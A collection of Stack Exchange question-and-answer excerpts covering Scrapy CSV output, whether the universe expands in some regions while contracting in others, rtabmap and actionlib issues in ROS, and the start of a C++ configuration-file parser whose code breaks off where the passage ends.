Writing to a csv file in a customized way using scrapy | Question: I've written a script in scrapy to grab different names and links from different pages of a website and write those parsed items to a csv file. When I run my script, I get the expected results and find a csv file filled with data. I'm using Python 3.5, and when I use scrapy's built-in command to write data to a csv file, I get a csv file with a blank line in every alternate row. Eventually, I tried the approach below to achieve flawless output (with no blank lines in between). Now it produces a csv file without the blank-line issue. I hope I did it the right way. However, if there is anything I can/should do to make it more robust, I'm happy to do it.
This is my script which provides me with a flawless output in a csv file:
import scrapy, csv
from scrapy.crawler import CrawlerProcess

class GetInfoSpider(scrapy.Spider):
    name = "infrarail"
    start_urls = ['http://www.infrarail.com/2018/exhibitor-profile/?e={}'.format(page) for page in range(65,70)]

    def __init__(self):
        self.infile = open("output.csv","w",newline="")

    def parse(self, response):
        for q in response.css("article.contentslim"):
            name = q.css("h1::text").extract_first()
            link = q.css("p a::attr(href)").extract_first()
            yield {'Name':name,'Link':link}
            writer = csv.writer(self.infile)
            writer.writerow([name,link])

c = CrawlerProcess({
    'USER_AGENT': 'Mozilla/5.0',
})
c.crawl(GetInfoSpider)
c.start()
Btw, I used .CrawlerProcess() to be able to run my spider from sublime text editor.
Answer: You should opt for the closed() method, as I've done below. This method will be called automatically once your spider is closed. It provides a shortcut to signals.connect() for the spider_closed signal.
class InfraRailSpider(scrapy.Spider):
    name = "infrarail"
    start_urls = ['https://www.infrarail.com/2020/english/exhibitor-list/2018/']

    def __init__(self):
        self.outfile = open("output.csv", "w", newline="")
        self.writer = csv.writer(self.outfile)
        self.writer.writerow(['title'])
        print("***"*20,"opened")

    def closed(self,reason):
        self.outfile.close()
        print("***"*20,"closed")

    def parse(self, response):
        for item in response.css('#exhibitor_list > [class^="e"]'):
            name = item.css('p.basic > b::text').get()
            self.writer.writerow([name])
            yield {'name':name} | {
"domain": "codereview.stackexchange",
"id": 31153,
"tags": "python, python-3.x, csv, web-scraping, scrapy"
} |
Could it be possible that the Universe is expanding in some areas while contracting in other areas? | Question: I am wondering if could it be possible that the Universe is expanding in some areas while contracting in other areas.
I have wondered if perhaps as one area of the Universe is squeezed inward by some force, a force such as dark energy, all the matter that is within that squeezed space is flowing outward in all directions and causing the areas outside of the squeezed space to expand via the influx of new matter. This would be similar to when you hold a small water balloon in your hand and then squeeze it.
Moreover, perhaps there may be multiple areas throughout the Universe that are being squeezed and multiple areas that are expanding at any given moment. Perhaps this could be an alternate explanation as to why galaxies are moving in different directions throughout the Universe. The overall volume of the Universe would always stay the same, especially considering that energy/matter cannot be created or destroyed.
Could it be possible that the Universe is expanding in some areas while contracting in other areas?
Answer: The universe is indeed expanding in some places and contracting in others. That's why we have galaxies: regions of the universe that were denser than average eventually stopped expanding, turned around, and collapsed. At larger scales, our Local Group is contracting but has not collapsed yet. Conversely, cosmic voids are regions where the density is lower than average, and the expansion there is faster than the global expansion rate.
You will notice that I am speaking of the expansion of the material within the universe, and not the expansion of space itself. That's because the expansion of space is not even a local physical phenomenon in the first place! It's a common misconception that space is some sort of medium that expands and carries things with it. Expanding space has no such effect -- it is really just a convention that simplifies the mathematics in cosmological contexts. It's a coordinate choice.
See this answer for further reading on "expanding space" not being a local physical phenomenon. There are also other Stack Exchange discussions of this point, e.g. "Is the universe actually expanding?" and "Can the Hubble constant be measured locally?" Incorrect answers to these questions are unfortunately common and frequently upvoted, a testament to how tenacious this misconception is, but I've linked correct answers.
It's worth noting, though, that expanding space can have concrete meaning globally, in the sense that the total volume of a closed universe -- measured on the synchronous surfaces of comoving observers -- grows.
Also, there is a local expansion force induced by dark energy. This is sometimes conflated with cosmic expansion, but it's really just a consequence of the local dark energy content (or cosmological constant). If you intend to ask whether this force spatially varies, to the best of our knowledge it does not, but this would be better suited for a separate answer (perhaps even a separate question). | {
"domain": "physics.stackexchange",
"id": 94524,
"tags": "cosmology, spacetime, astrophysics, space-expansion, universe"
} |
rtabmap+camera pose | Question:
hi all, i am using rtabmap for mapping and stereo camera pose estimation. i am following the rtabmap tutorials and created a map from stereo images saved in a directory (tutorial link: https://github.com/introlab/rtabmap/wiki/Stereo-mapping#process-a-directory-of-stereo-images-in-ros), but when i roslaunch the launch file, out of 1035 stereo images rtabmap gives me only 44 camera poses. how can i set rtabmap so that it gives me a camera pose for every stereo image?
thanks
Originally posted by zahra.kh on ROS Answers with karma: 21 on 2017-10-29
Post score: 0
Answer:
Add "--Rtabmap/CreateIntermediateNodes true" to rtabmap_args. This will add empty nodes in the graph with their pose between nodes used for mapping. You may not have one pose per image if the odometry cannot process as fast as the images are published.
Originally posted by matlabbe with karma: 6409 on 2017-10-29
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by zahra.kh on 2017-10-29:
thanks matlabbe | {
"domain": "robotics.stackexchange",
"id": 29219,
"tags": "slam, navigation, rtabmap"
} |
actionlib and rqt | Question:
Hello,
I'm learning ROS now and trying to create an action client in my rqt plugin.
No problem to catkin build the plugin. But when load the plugin, I got error as below:
undefined symbol: _ZN9actionlib17ConnectionMonitor21cancelConnectCallbackERKN3ros25SingleSubscriberPublisherE)
Unmangled:
actionlib::ConnectionMonitor::cancelConnectCallback(ros::SingleSubscriberPublisher const&)
My code is similar to the following. Is it a rqt bug, or is there anything wrong in my code?
Thank you for your help!
class MyPlugin : public rqt_gui_cpp::Plugin
{
  Q_OBJECT
public:
  MyPlugin();
  virtual void initPlugin(qt_gui_cpp::PluginContext& context);
  virtual void shutdownPlugin();
private:
  Ui::MyPluginWidget ui_;
  QWidget* widget_;
  actionlib::SimpleActionClient<my_msgs::MyAction> aClient;
};

MyPlugin::MyPlugin()
  : rqt_gui_cpp::Plugin()
  , widget_(0)
  , aClient("some action")
{
  setObjectName("Plugin");
}
Originally posted by Fulin on ROS Answers with karma: 11 on 2017-09-28
Post score: 0
Original comments
Comment by gvdhoorn on 2017-09-28:
I've added the unmangled version of the missing symbol to your question text.
Comment by Fulin on 2017-09-29:
Hi Gvdhoom,
By the way, where should I use
actionlib::ConnectionMonitor::cancelConnectCallback(ros::SingleSubscriberPublisher const&)
in shutdownPlugin()?
Thank you!
Comment by gvdhoorn on 2017-09-29:
That is a different issue, so I advise you to post that as a new question. We try to maintain a 1 question - 1 answer ratio here on ROS Answers.
Answer:
Are you linking all required libraries? Can you show your CMakeLists.txt? The fact that CMake currently does not complain is expected: plugins don't need all symbols present at compile time, as it is assumed that at runtime those will be resolved by the plugin host.
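(As an illustration, not part of the original answer: a sketch of the kind of entries that are typically missing in such cases. Package names here are examples; adapt them to your actual dependencies, and declare the same packages in package.xml.)

```cmake
# CMakeLists.txt (fragment) -- make actionlib a catkin build dependency
find_package(catkin REQUIRED COMPONENTS
  roscpp
  actionlib
  rqt_gui_cpp
)

# ... after add_library(${PROJECT_NAME} ...) for the plugin:
target_link_libraries(${PROJECT_NAME} ${catkin_LIBRARIES})
```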
Originally posted by gvdhoorn with karma: 86574 on 2017-09-28
This answer was ACCEPTED on the original site
Post score: 0
Original comments
Comment by Fulin on 2017-09-29:
Hi Gvdhoom,
You are right,
I missed the actionlib related depends in CMakeLists.txt and package.xml files. Might be the boost also? After adding them, now it works fine.
Thank you! | {
"domain": "robotics.stackexchange",
"id": 28953,
"tags": "actionlib, rqt"
} |
Calculating Garland Degree of String | Question: Purpose
A garland word is a word
formed by chopping off the last few letters and “wrapping around” to the start.
For example: You can chop off the trailing "on" from "onion" and still form the word by wrapping around to the starting "on". In other words, you can write the letters "o", "n", "i" in a circle, in that order, and form the word "onion".
I say that a garland word is of degree n if you can do the above with the last n letters of the word.
Build an implementation that returns the garland degree of a String. (Note, this was a dailyprogrammer subreddit question)
Strategy
Check if String is size 0 (return garland degree of 0) or size 1 (return garland degree of 1).
Start with the first character in the String. Iterate through the characters in the String from the second character onwards. Do we see a matching character? If not, return degree 0.
Move on to the first + second characters in the String. Iterate through the characters in the String from the 3rd character onwards for a matching substring - if we can't see one, return degree 1.
Repeat.
Note that the upper limit of the garland degree should be the floor of the length of the String divided by 2. (Right? Or am I missing something?)
Implementation
import java.util.Arrays;

public class GarlandDegreeIdentifierImpl implements GarlandDegreeIdentifier {

    @Override
    public int identifyGarlandDegree(final String candidate) {
        switch (candidate.length()) {
            case 0: {
                return 0;
            }
            case 1: {
                return 1;
            }
            default: {
                final char[] chars = candidate.toCharArray();
                for (int subStringIndex = 1; subStringIndex <= chars.length - subStringIndex; subStringIndex++) {
                    final char[] startingChars = Arrays.copyOfRange(chars, 0, subStringIndex);
                    final char[] remainingChars = Arrays.copyOfRange(chars, subStringIndex, chars.length);
                    if (subsetIndexIdentifier(remainingChars, startingChars) == -1) {
                        return subStringIndex - 1;
                    }
                }
                return Math.floorDiv(chars.length, 2);
            }
        }
    }

    @Override
    public int subsetIndexIdentifier(final char[] chars, final char[] candidateChars) {
        for (int index = 0; index <= chars.length - candidateChars.length; index++) {
            int counter = 0;
            for (int candidateCharIndex = 0; candidateCharIndex < candidateChars.length; candidateCharIndex++) {
                if (chars[index + candidateCharIndex] != candidateChars[candidateCharIndex]) {
                    counter++;
                }
            }
            if (0 == counter) {
                return index;
            }
        }
        return -1;
    }
}
Answer: You are completely over-doing it. Your algorithm will be O(n^3) (I think) on the length of the input when you can do it more simply in O(n^2).
Consider the following instead:
Start at the middle of the input.
While the substring starting from this index is not equal to the substring of the same length at the start of the input, we increment the index.
Finally, we return the length of the final substring that matched.
Basically, the logic can be summed up by this drawing:
-------------
^^^^^^ ^^^^^^ matches or not?
// if no continue
-------------
^^^^^ ^^^^^ matches or not?
// if no continue
-------------
^^^^ ^^^^ matches or not?
You can see the logic.
Implemented in code, it would be the following:
private static int identifyGarlandDegree(String candidate) {
    int length = candidate.length();
    int index = length / 2;
    while (!candidate.substring(0, length - index).equals(candidate.substring(index))) {
        index++;
    }
    return length - index;
}
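For cross-checking, the same loop ports directly to Python (function name mine):

```python
def garland_degree(candidate: str) -> int:
    """Length of the longest overlap between a prefix and a suffix,
    using the same loop as the Java version above."""
    length = len(candidate)
    index = length // 2
    # Shrink the tested overlap until prefix and suffix of that length match.
    while candidate[:length - index] != candidate[index:]:
        index += 1
    return length - index
```

Sanity checks: "onion" has degree 2, "alfalfa" has degree 4, and a string with no wrap-around (like "abc") has degree 0.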
Note that we don't need to add a check on index: it won't go out of bounds since when index == length, it will exit normally (empty string being equal to another empty string). | {
"domain": "codereview.stackexchange",
"id": 18388,
"tags": "java, strings, programming-challenge"
} |
Isn't the transition at the critical point always a continuous phase transition? | Question: At page 145 of Chaikin and Lubensky's Principles of Condensed matter physics, there are two figures 4.0.1(a) and 4.0.1(b). Figure (a) shows that at $T=T_c$, there is a continuous transition (the order parameter changes continuously) while figure (b) shows that at $T=T_c$ there is a discontinuous transition (the order parameter jumps discontinuously).
But isn't the transition at the critical point always continuous? How would the second situation as described in diagram (b) (the order parameter suddenly jumping to a nonzero value from a zero value) arise at the critical point?
Answer: Simple example: Water-ice transition. If you take the density to be your order parameter, the density drops discontinuously at $0^\circ$C.
A second simple example: An Ising model in an external field at $T=0$. If the external field, $H$, is positive, the magnetization, $M$, is $+1$. If the external field is negative, $M=-1$. Clearly $M$ changes discontinuously at $H=0$.
A third, more complex example: A 2D Ising model below the critical temperature. If you don't like the fact that the above transition takes place at $T=0$, in 2D the Ising model spontaneously magnetizes even at small nonzero temperatures. In this case, just above $H=0$, $M=M_0$, and just below $H=0$, $M=-M_0$. $M$ jumps discontinuously.
In general, a critical point is where any phase transition occurs, continuous or discontinuous. It refers to the combination of parameters that sit on the boundary between one phase and another. So a critical temperature is the temperature that separates two phases (Any phases! Any type of transition!) and a critical field is the field that separates two phases, etc.
If you think about Landau theory, a first-order (discontinuous) phase transition happens when the Landau free energy has two local minima, and the global minimum changes from one value to another. Consider the following graph, where $\phi$ is the order parameter and $\mathcal{L}$ is the Landau free energy.
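This double-minimum mechanism is easy to verify numerically. A sketch with an illustrative quartic free energy of my own choosing, $\mathcal{L}(\phi) = r\phi^2 - \phi^3 + \phi^4$ with $r$ standing in for temperature: the global minimum sits at $\phi = 0$ for $r > 1/4$ and jumps discontinuously to $\phi \approx 1/2$ just below $r = 1/4$.

```python
def global_minimum(r, steps=4000):
    """Brute-force global minimizer of L(phi) = r*phi^2 - phi^3 + phi^4 on [0, 1]."""
    best_phi, best_val = 0.0, 0.0
    for k in range(steps + 1):
        phi = k / steps
        val = r * phi**2 - phi**3 + phi**4
        if val < best_val:
            best_phi, best_val = phi, val
    return best_phi

print(global_minimum(0.24))  # nonzero: ordered phase
print(global_minimum(0.26))  # 0.0: disordered phase -- a discontinuous jump
```

Both local minima exist on either side of $r = 1/4$; only the identity of the *global* one changes, which is exactly the first-order scenario described above.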
Here, just above $T_c$, the Landau free energy has two local minima, at $\phi=0$ and $\phi>0$. Above $T_c$, $\phi=0$ is the global minimum. At $T_c$, the two minima have the same value for the Landau free energy. Below $T_c$, the minimum with $\phi>0$ has the lowest Landau free energy. Thus, above $T_c$, the system will have $\phi=0$, and below $T_c$ the system will have $\phi>0$ discontinuously. | {
"domain": "physics.stackexchange",
"id": 42173,
"tags": "statistical-mechanics, condensed-matter, phase-transition, critical-phenomena"
} |
How can I read off the fact that gravity is associated with spin-2 particles from the Einstein-Hilbert action? | Question: I have often heard that the gravitational field has spin $2$. How can I read the spin of the field from the Einstein-Hilbert action
$$S=\int \! \mathrm{d}^4x \,\sqrt{|g|} \, \mathcal{R} \, \, \, ?$$
Answer: A common procedure to determine the spin of the excitations of a quantum field is to first determine the conserved currents arising from quasi-symmetries via Noether's theorem. For example, in the case of the Dirac field, described by the Lagrangian,
$$\mathcal{L}=\bar{\psi}(i\gamma^\mu \partial_\mu -m)\psi $$
the associated conserved currents under a translation are,
$$T^{\mu \nu} = i \bar{\psi}\gamma^\mu \partial^\nu \psi - \eta^{\mu \nu} \mathcal{L}$$
and the currents corresponding to Lorentz symmetries are given by,
$$(\mathcal{J}^\mu)^{\rho \sigma} = x^\rho T^{\mu \sigma} - x^\sigma T^{\mu \rho}-i\bar{\psi}\gamma^\mu S^{\rho \sigma} \psi$$
where the matrices $S^{\mu \nu}$ form the appropriate representation of the Lorentz algebra. After canonical quantization, the currents $\mathcal{J}$ become operators, and acting on the states will confirm that, in this case, the excitations carry spin $1/2$. In gravity, we proceed similarly. The metric can be expanded as,
$$g_{\mu \nu} = \eta_{\mu \nu} + f_{\mu \nu}$$
and we expand the field $f_{\mu \nu}$ as a plane wave with operator-valued Fourier coefficients, i.e.
$$f_{\mu \nu} \sim \int \frac{\mathrm{d}^3 p}{(2\pi)^3} \frac{1}{\sqrt{\dots}} \left\{ \epsilon_{\mu \nu} a_p e^{ipx} + \dots\right\}$$
We only keep terms of linear order $\mathcal{O}(f_{\mu \nu})$, compute the conserved currents analogously to other quantum field theories, and once promoted to operators as well act on the states to determine the excitations indeed have spin $2$.
Counting physical degrees of freedom
The graviton has spin $2$ and, as it is massless, only two degrees of freedom. We can verify this in gravitational perturbation theory. We know $h^{ab}$ is a symmetric matrix, and so it has only $d(d+1)/2$ distinct components. In de Donder gauge, $$\nabla^{a}\bar{h}^{ab} = \nabla^a\left(h^{ab}-\frac{1}{2}h g^{ab}\right) = 0$$
which provides us $d$ gauge constraints. There is also a residual gauge freedom, providing that infinitesimally, we shift by a vector field, i.e.
$$X^\mu \to X^\mu + \xi^\mu$$
providing $\square \xi^\mu + R^\mu_\nu \xi^\nu = 0$, which restricts us by $d$ as well. Therefore the total physical degrees of freedom are,
$$\frac{d(d+1)}{2}-2d = \frac{d(d-3)}{2}$$
If $d=4$, the graviton indeed has only two degrees of freedom.
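The arithmetic in the last step is easy to spot-check; a small sketch:

```python
def graviton_dof(d):
    """Physical graviton polarizations in d spacetime dimensions:
    symmetric components minus de Donder gauge conditions minus
    residual gauge freedom."""
    return d * (d + 1) // 2 - 2 * d

for d in range(4, 7):
    print(d, graviton_dof(d))  # 4 -> 2, 5 -> 5, 6 -> 9
```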
Important Caveat
Although we often find a field with a single vector index has spin one, with two indices spin two, and so forth, it is not always the case, and determining the spin should be done systematically. Consider, for example, the Dirac matrices, which satisfy the Clifford algebra,
$$\{ \Gamma^a, \Gamma^b\} = 2g^{ab}$$
On an $N$-dimensional Kahler manifold $K$, if we work in local coordinates $z^a$, with $a = 1,\dots,N$, and the metric satisfies $g^{ab} = g^{\bar{a} \bar{b}} = 0$, the expression simplifies:
$$\{ \Gamma^a, \Gamma^b\} = \{ \Gamma^{\bar{a}}, \Gamma^{\bar{b}}\} = 0$$
$$\{ \Gamma^a, \Gamma^{\bar{b}}\} = 2g^{ab}$$
Modulo constants, we see that we can think of $\Gamma^a$ as an annihilation operator, and $\Gamma^{\bar{b}}$ as a creation operator for fermions. Given that we define $\lvert \Omega \rangle$ as the Fock vacuum, we can define a general spinor field $\psi$ on the Kahler manifold $K$ as,
$$\psi(z^a,\bar{z}^{\bar{a}}) = \phi(z^a,\bar{z}^{\bar{a}}) \lvert \Omega \rangle + \phi_{\bar{b}}(z^a,\bar{z}^{\bar{a}}) \Gamma^{\bar{b}} \lvert \Omega \rangle + \dots$$
Given that $\phi$ has no indices, we would expect it to be a spinless field, but it can interact with the $U(1)$ part of the spin connection. Interestingly, we can only guarantee that $\phi$ is neutral if the manifold $K$ is Ricci-flat, in which case it is Calabi-Yau manifold. | {
"domain": "physics.stackexchange",
"id": 13145,
"tags": "general-relativity, quantum-spin, gravitational-waves"
} |
Representation of the $\rm SU(5)$ model in GUT | Question: In Srednicki's textbook Quantum Field Theory, section 97 discusses Grand Unification. On page 606, it states:
In terms of $\rm SU(5)$, we have
\begin{equation}
5 \otimes 5 = 15_{S} \oplus 10_{A} \tag{97.5}
\end{equation}
where the subscripts $S$ and $A$ refer to symmetric and antisymmetric respectively.
To my understanding, $15_{S}$ is a $15 \times 15$ matrix, and $10_{A}$ is a $10 \times 10$ matrix. Am I right?
However, in the text, a left-handed Weyl field $\chi_{ij} = - \chi_{ji}$ in the 10 representation is defined. Its components are given by
\begin{equation}
\chi_{ij} = \left( \begin{array}{ccccc} 0 & \overline{u}^{g} & -\overline{u}^{b} & u_{r} & d_{r} \\ -\overline{u}^{g} & 0 & \overline{u}^{r} & u_{b} & d_{b} \\ \overline{u}^{b} & -\overline{u}^{r} & 0 & u_{g} & d_{g} \\ -u_{r} & - u_{b} & -u_{g} & 0 & \overline{e} \\ -d_{r} & -d_{b} & -d_{g} & -\overline{e} & 0
\end{array} \right). \tag{97.12}
\end{equation}
Why is $\chi_{ij}$ not a $10 \times 10$ matrix, but a $5\times 5$ matrix?
Answer: Representations are vector spaces that behave a certain way when the group acts on them. Representations are often labelled by their vector space dimension. The fundamental representation of $SU(5)$ is just the space of 5-dimensional complex vectors, so we call it $5$. The representation $10_A$ is a 10-dimensional vector space, and $15_S$ is a 15-dimensional vector space.
Now, it so happens that one convenient way of representing the vectors of $10_A$ is as anti-symmetric $5\times 5$ matrices. That is, the 10 basis "vectors" of $10_A$ are the matrices $\chi^{12}, \chi^{13}, \dots$, where
$$\chi^{12} = \begin{pmatrix}0 & 1 & 0 & 0 & 0 \\ -1 & 0 & 0 &0&0\\0&0&0&0&0\\0&0&0&0&0\\0&0&0&0&0\end{pmatrix}$$
and so on.
You can work out that there are "5 choose 2" = 10 of these basis vectors. Likewise, you can represent the 15 basis vectors of $15_S$ as the 15 independent symmetric $5\times 5$ matrices.
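The dimension counting can be made concrete by enumerating the independent basis matrices; a quick sketch (function name mine):

```python
from itertools import combinations, combinations_with_replacement

n = 5

# One antisymmetric basis matrix per index pair i < j  ("5 choose 2" of them)
antisym_pairs = list(combinations(range(n), 2))
# One symmetric basis matrix per unordered pair i <= j
sym_pairs = list(combinations_with_replacement(range(n), 2))

def antisym_basis_matrix(i, j, n=5):
    """E.g. (i, j) = (0, 1) reproduces the chi^{12} matrix shown above."""
    m = [[0] * n for _ in range(n)]
    m[i][j], m[j][i] = 1, -1
    return m

print(len(antisym_pairs), len(sym_pairs))  # 10 15
```

The two counts add up to $25 = 5 \times 5$, matching $5 \otimes 5 = 15_S \oplus 10_A$.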
The key thing to remember is that the vectors in a representation are an abstract thing. You can represent them as lists of numbers, or as particular matrices, or as anything else. | {
"domain": "physics.stackexchange",
"id": 62069,
"tags": "field-theory, group-theory, representation-theory, grand-unification"
} |
Randomness and Thermodynamics | Question: I am currently reading The road to reality by Roger Penrose. In chapter 27 he discusses time symmetry in dynamic evolution.
He defines the Second Law of thermodynamics the following way:
Heat flows from a hotter to a colder body.
He states that this law implies time asymmetry: When you look at a system of two bodies, one colder than the other, the hotter body will become colder and the heat will transfer to the other body until they are in equilibrium. The system evolves perfectly deterministically. But when you look at the system backwards, the two bodies are in equilibrium and after some time suddenly one body will get colder and the other one will get hotter.
Now my question: In a universe where time evolution is reversed would such a process be perceived as a random process with no deterministic cause? In a two body system in equilibrium one body would suddenly get colder and the other one hotter. But in this universe it can not be determined which body will get colder and when - it is essentially a random process. If the theoretical inhabitants of this universe looked at this process backwards, they could not really recover the Second Law of Thermodynamics. From their viewpoint they could only state that the body that ends up hotter after the equilibrium breaks will get hotter.
Is it possible that there are such "hidden laws" that underlie a process, but cannot be determined because their dynamical evolution is hidden similarly to the process described above?
Answer: Probably a more interesting question is: How can these hypothetical inhabitants observe or think?
If thoughts are also time reversed, whatever that means, the mental states of the observers go from (0) seeing that the system reached equilibrium to (1) watching the equilibration process to (2) expecting that heat transfer will take place. So they're not surprised, unless they have a memory of their future.
That's, of course, supposing that mental states are well defined and that the sense of present would be preserved, which is not obviously the case $-$ after all, synapses and electrical impulses are also backwards.
These inhabitants' eyes shoot light rays instead of absorbing them: Nerve impulses come through the optical nerves and a series of inverse chemical reactions culminate with the retinal changing its structure, causing the pigment opsin to emit a light pulse.
Another important question is: how exactly is the time evolution reversed? The nature of the mechanism responsible for this change is likely to strongly influence the answers to these questions. Actually, without this mechanism being specified, I'm not really sure that's a physics question at all.
Now, if the observers are "normal" and the time is reversed only in an experiment of theirs, then, as others pointed out in the comments, the second law is a statistical law: it doesn't prohibit weird stuff from happening, only posits it's incredibly unlikely it will. From a microscopic point of view, the system has been put in an extremely special state, one that leads to heat being conducted along the heat gradient, instead of against it.
"domain": "physics.stackexchange",
"id": 44998,
"tags": "thermodynamics, statistical-mechanics, thought-experiment, randomness"
} |
Differences between perturbation theory in quantum mechanics, quantum field theory and condensed matter physics? | Question:
For perturbation theory method, are there any difference or links in basic quantum mechanics, quantum field theory and in condensed matter physics?
I know the meaning in basic quantum mechanics (focus on single particle problem, especially), for example, considering the following partition for total Hamiltonian $H$
$$H= H_0 + \mu H_1$$
if one knows the solution for $H_0$, then one can derive the approximate solution (to evaluate the energy correction, wavefunction correction) of the total Hamiltonian $H$ based on the solution of $H_0$ when $\mu$ is a very small parameter. I think this must be the original idea developed to attack real physical problems in quantum mechanics.
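As a concrete warm-up on the quantum-mechanics side, the standard Rayleigh-Schrodinger result can be checked on a two-level toy model (all matrix entries below are arbitrary choices of mine):

```python
import math

# H0 = diag(E0, E1); H1 = [[a, b], [b, d]] in the H0 eigenbasis (arbitrary values)
E0, E1 = 0.0, 1.0
a, b, d = 0.3, 0.5, -0.2
mu = 0.01

# Exact ground-state energy of the 2x2 Hamiltonian H = H0 + mu*H1
h00, h01, h11 = E0 + mu * a, mu * b, E1 + mu * d
tr, det = h00 + h11, h00 * h11 - h01**2
exact = (tr - math.sqrt(tr**2 - 4 * det)) / 2

# Perturbative expansion through second order:
# E ~ E0 + mu*<0|H1|0> + mu^2 |<1|H1|0>|^2 / (E0 - E1)
perturbative = E0 + mu * a + mu**2 * b**2 / (E0 - E1)

print(abs(exact - perturbative))  # agreement up to O(mu^3) corrections
```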
But how this method can be applied in quantum field theory (considering relativistic effect) and also survives in condensed matter physics (many-body), both based on Green's function rather than wavefunction? What's the missing history? How to bridge this gap?
Any relevant comments and references are beneficial. Thanks in advance.
Answer: Quantum field theory is a very abstract and complicated theory; one needs in general time to assimilate it, in particular as the degree of abstraction is much higher than that of 1-particle quantum mechanics. What is the bridge between QM and QFT? The basis of QFT is still a Hilbert space (called Fock space), but its states are no longer one-particle wave functions, but multi-particle states. That's a large leap in abstraction; even if the mathematical formalism is in principle the same, it does not look the same. Operators are defined on the Fock space as well as on the 1-particle Hilbert space. The Hamiltonian operator can be defined (for a non-interacting theory; for an interacting theory it's more complicated in general), as well as a momentum operator etc. These operators can be expressed by the (most) basic operators of the Fock space: the creation and annihilation operators. If you don't feel familiar with these operators, study the 1-particle harmonic oscillator. In that context (1-particle Hilbert space) these operators are already defined, certainly with the "nasty" property of being non-diagonal in the usual representation. BTW in the case of the 1-particle harmonic oscillator, they are also non-diagonal. Once you get used to it, this turns out to be a rather nice property in fact.
Further abstraction provides the Heisenberg-picture in QFT, in contrast, to commonly used Schrodinger picture. But as you certainly know you can also swap from one picture to the other by a unitary transformation, and the physics does not change. This rule is valid in QM as well as in QFT. Probably you can also formulate QFT in the Schrodinger picture, but the formalism will become even more complicated than it is already, so better not to try it.
So time-dependence is transferred to the operators. This is necessary to make the theory explicitly relativistic invariant: time and space should be treated on the same footing.
This is certainly one of the biggest difference between QM and QFT. But time does not lose completely the special role it has in QM. Time also remains a parameter in QFT as well it is in QM. It is more the other way around: Whereas position is an operator in QM, in QFT it is downgraded to a parameter like time, as it should be. This is BTW well described in the QFT book of Srednicki.
Last but not least, the equations to solve are usually non-linear. That means, in general, they cannot be solved. Actually, this is nothing really new:
also in QM, this happens (but less often). And as you already mentioned, in order to make progress, perturbation theory is used. The Hamiltonian is split into a non-interacting part and an interacting part. This is crucially based on the existence of a small parameter (call it $\mu$ or $\alpha$ or $\lambda$ etc.). The principle is the same in QM as well as in QFT. Perturbation theory is then based on the expansion of the evolution operator $|\Psi(t)\rangle = U(t,t_0)|\Psi(t_0)\rangle$. The evolution operator can be written as a series called the Dyson series, with the solution (see for instance the Wikipedia page on the subject "Dyson series")
$$U(t,t_0) = T \exp(-i \int_{t_0}^{t} d\tau V(\tau))$$
where $V$ is the small interaction part of the Hamilton operator $H=H_0+V$ and $T$ is the time-ordering operator (for more see Wikipedia or QFT textbooks).
Each term of this series can be represented by a Feynman-diagram. I think the Dyson-series can already be used in non-relativistic QM.
However, the interaction operator $V(\tau)$ is rather different from the one of familiar QM. In QM it describes in most cases an external field or some "wave-function-different" operator; in QFT the mutual interaction between the field in consideration and the interaction, typically another field, is taken into account. In this way you get the Green's functions in, in particular, if self-interaction $V=\frac{\lambda}{4!}\phi^4$ of the field $\phi$ is considered.
I think these are the main characteristics of how QFT is different from QM. Certainly, there is much more to say, but this can be read in QFT-books.
I admit, most books advance in big steps towards Feynman diagrams and renormalization, so the basics are often treated quickly. One last advice:
forget about wave-functions; they no longer exist in QFT. Field operators, often designated by the same symbol have nothing to do with wave-functions. The multi-particle states take over the role of the wave-functions.
Read books or/and ask your professor. Most well-known sources are Peskin-Schroeder, Srednicki, (both are not so easy to read for a beginner), Zee's book QFT in a nutshell, L.H.Ryder QFT etc. | {
"domain": "physics.stackexchange",
"id": 38345,
"tags": "quantum-mechanics, quantum-field-theory, condensed-matter, perturbation-theory, greens-functions"
} |
Unknown program 'spark-itemsimilarity' chosen | Question: I have cloudera CDH5 running inside a virtual box.
when I try to run :
mahout spark-itemsimilarity ....
I get the error:
Unknown program 'spark-itemsimilarity' chosen.
Do I have to install any additional package to run spark-itemsimilarity?
Any help would be appreciated !
Answer: Spark support for Mahout came with the Mahout 0.10 release, while you are using the 0.9 release. This should explain why you get the unknown program error. I would suggest using a higher version of Mahout. | {
"domain": "datascience.stackexchange",
"id": 845,
"tags": "apache-spark, apache-mahout, recommender-system"
} |
Why we don't talk about unit cells in hcp/fcc structures? | Question: I'm studying basics of Solid State Chemistry from this source.
So there are 14 types of Bravais crystal lattices (Primitive + Centered) in 3D. Every solid in this universe is made by the unit cells of these lattices. OK so far so good.
Later on there was the topic of Close packing and Structure of Metallic Crystals and we are told about hcp /fcc types of structures.
Problems:
Why do we remain silent about the unit cells and crystal system in this context? It seems like a huge disconnect.
Is there any relation between the Hexagonal Unit cell and hexagonal close packing?
Answer: We do not remain silent about the unit cells in this context. The hexagonal close packed structure is called so because it has hexagonal unit cell, and the other one is called fcc precisely because its unit cell is face-centered cubic.
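As a side note, the name "close packing" is quantitative: both fcc and hcp fill the same fraction of space, $\pi/(3\sqrt{2}) \approx 0.7405$. A quick sketch confirms this for the fcc cell (4 atoms per cell; nearest neighbours touch along a face diagonal):

```python
import math

a = 1.0                      # fcc cell edge (arbitrary units)
r = a * math.sqrt(2) / 4     # spheres touch along the face diagonal: 4r = a*sqrt(2)
atoms_per_cell = 4           # 8 corners * 1/8 + 6 faces * 1/2

fraction = atoms_per_cell * (4 / 3) * math.pi * r**3 / a**3
print(round(fraction, 4))  # 0.7405
```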
| {
"domain": "chemistry.stackexchange",
"id": 8920,
"tags": "physical-chemistry, crystal-structure, solid-state-chemistry"
} |
Simple .cfg parser | Question: I'm currently working to implement a simple configuration file parser. I intend to add more functional down the road.
ConfigReader.hpp
#include <string>
#include <vector>

class ConfigReader
{
public:
    struct record
    {
        std::string section;
        std::string name;
        std::string value;
    };

    ConfigReader();
    explicit ConfigReader (const std::string & file);

    bool readfile (const std::string & file);

    std::string get_string (const std::string & tsection,
        const std::string & tname, std::string tdefault = std::string());

private:
    std::vector<record> records;
};
ConfigReader.cpp
#include <fstream>
#include "ConfigReader.hpp"
namespace
{
/* Erases leading tabs, leading spaces; trailing tabs, trailing spaces. */
std::string & trim (std::string & str)
{
// leading tabs / spaces
int i = 0;
while (i < (int) str.length() && (str[i] == ' ' || str[i] == '\t'))
++i;
// erase leading tabs / spaces
if (i > 0)
str.erase (0, i);
int j = i = str.length();
while (i > 0 && (str[i - 1] == ' ' || str[i - 1] == '\t'))
--i;
// erase trailing tabs / spaces
if (i < j)
str.erase (i, j);
return str;
}
